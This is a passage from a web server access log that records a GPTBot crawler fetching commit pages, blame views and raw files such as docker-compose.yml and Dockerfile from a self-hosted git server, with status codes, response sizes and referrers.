74.7.227.38] [Length 52643] [Gzip 8.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 10798] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:14:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17344] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:14:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 61990] [Gzip 15.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:14:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 265988] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:14:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11357] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" -[17/Feb/2026:14:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 1014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" -[17/Feb/2026:14:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" -[17/Feb/2026:14:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 12615] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:14:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 12489] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:14:22:05 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" -[17/Feb/2026:14:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:14:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11895] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" -[17/Feb/2026:14:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 18444] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:14:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17111] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:14:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18464] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:14:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10420] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 18466] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17480] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15254] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17481] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:14:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17481] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:14:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" -[17/Feb/2026:14:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11170] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" -[17/Feb/2026:14:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" -[17/Feb/2026:14:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17386] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18847] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15256] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17090] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:14:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17661] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 18469] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17661] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15233] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17110] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:14:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17459] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:14:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17662] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:14:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17385] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-eol" -[17/Feb/2026:14:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 18841] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-eol" -[17/Feb/2026:14:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 18838] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:14:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17386] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-eol" -[17/Feb/2026:14:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17104] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:14:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12546] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12307] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12535] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 12520] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" -[17/Feb/2026:14:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" -[17/Feb/2026:14:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile?display=source" [Client 74.7.227.38] [Length 11586] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" -[17/Feb/2026:14:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" -[17/Feb/2026:14:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 10161] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" -[17/Feb/2026:14:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" -[17/Feb/2026:14:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 10181] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:14:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10430] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 